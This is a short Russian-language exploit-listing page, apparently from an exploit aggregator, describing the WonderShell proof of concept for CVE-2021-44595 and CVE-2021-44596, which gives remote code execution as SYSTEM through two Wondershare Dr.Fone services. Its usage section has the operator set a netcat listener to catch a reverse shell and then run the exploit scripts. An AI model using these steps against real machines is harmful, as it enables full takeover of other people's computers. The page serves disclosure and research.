## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NETANELC305-WONDERSHELL
# WonderShell - CVE - 2021-44595 | CVE - 2021-44596
## Обнаружено
Нетанель Коэн и Томер Пелед, исследователи безопасности из BugSec.
## Описание
Пример PoC для эксплуатации Wondershare Dr.Fone.
Dr.Fone — это телефонный набор инструментов, разработанный Wondershare и уязвимый к RCE.
Только имея сетевой доступ, мы можем выполнить удалённый код от имени пользователя SYSTEM.
Уязвимые службы:
> InstallAssistService.exe
> ElevationService.exe
Протестировано на версиях: 12.0.7, 11.4
## Использование
Измените IP-адрес и порт и выполните.
root@kitploit:~
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
root@kitploit:~
nc -lvnp 1337
./InstallAssistServiceRCE.py
## Публикации
https://medium.com/@tomerp_77017/wondershell-a82372914f26